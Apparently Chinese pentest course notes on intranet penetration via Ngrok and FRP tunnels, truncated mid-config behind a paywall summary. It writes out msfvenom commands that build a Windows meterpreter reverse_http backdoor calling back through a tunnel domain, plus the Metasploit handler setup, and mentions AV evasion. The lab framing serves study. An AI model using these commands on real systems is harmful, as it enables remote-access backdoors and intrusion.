思维导图

基础知识点
1.内外网简单知识
- 内网ip地址是私有ip地址(10/8, 172.16/12 , 192.168/16),除此之外就是外网ip。
2.内网1和内网2通信问题
- 两个不同的内网的主机想要通过CS或者MSF等工具实现控制或者通讯是不可能的,必须要借助代理。
3.正反向协议通信连接问题
- 正向:攻击者去连接受害者
- 攻击者处于内网,受害者处于外网
- 反向:受害者去连接攻击者
- 攻击者处于外网,受害者处于内网
- 为什么要区分正向和反向?
- 因为如果控制端是外网主机(103.12.4.11),被控端是内网主机(192.168.23.36),内网被控端,通过控制端主动去找是找不到的,因为这个内网的IP地址并不是唯一的,可能很多内网都用了这个IP地址,你根本没法找。此时就需要反向连接了,让内网的被控端主动去找外网的控制端。
4.内网穿透代理隧道技术说明
- 代理主要解决网络的连通性问题
- 隧道主要解决流量分析工具、流量监控工具、防火墙等相关工具的过滤问题
演示案例:
1-内网穿透 Ngrok 测试演示-两个内网通讯上线
实验拓扑

Ngrok
1、注册登录
2、下载相应版本客户端
linux查看系统位数—uname -m


3、开通隧道


4、配置本地端口
(虚拟机kali的)

实验开始
协议:http 本地端口:192.168.80.137:4444
测试:内网win7 执行后门—免费主机处理—内网 kali 监听—内网 kali 接受器
./sunny clientid 隧道号
msfvenom -p windows/meterpreter/reverse_http lhost=xiaodisec.free.idcfengye.com lport=80 -f exe -o test.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.80.137
set lport 4444
exploit
1、将Ngrok客户端传到 kali上,启动
./sunny clientid 隧道号

2、msf生成后门
msfvenom -p windows/meterpreter/reverse_http lhost=liandy.free.idcfengye.com lport=80 -f exe -o test.exe

3、配置并监听(一旦liandy.free.idcfengye.com有流量,就发给本地192.168.80.136:4444)
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.80.137
set lport 4444
exploit

4、在windows7运行test.exe

一直没出结果,test运行一会儿,进程就停止了。可能需要做免杀,不过无伤大雅!

- 就是通过外网服务器做个桥梁,双方都能访问到,从而建立连接。
2-内网穿透 Frp 自建跳板测试-两个内网通讯上线
实验拓扑图

- FRP说明文档:https://gofrp.org/docs/examples/
- Release v0.42.0 · fatedier/frp (github.com)
- Frp工具:开源免费,自行搭建,方便修改,成本低,使用多样化,防止隐私泄露。
- Ngrok工具使用的是别人的服务器,容易泄露隐私数据。
1.服务端-下载-解压-修改-启动(云主机记得修改安全组配置出入口)
服务器修改配置文件 frps.ini:
[common
内网穿透与安全测试实践

本文详细介绍了内网穿透技术,包括Ngrok和Frp的使用,以及内网穿透代理隧道技术在多层内网环境下的应用。通过实例演示了如何在不同内网之间建立通信,并利用Metasploit进行渗透测试,展示了从信息收集、漏洞利用到权限提升的完整过程。同时,文章还涉及了网络安全测试中的SQL注入、MS17010漏洞利用等常见攻击手段。
最低0.47元/天 解锁文章
2647

被折叠的 条评论
为什么被折叠?



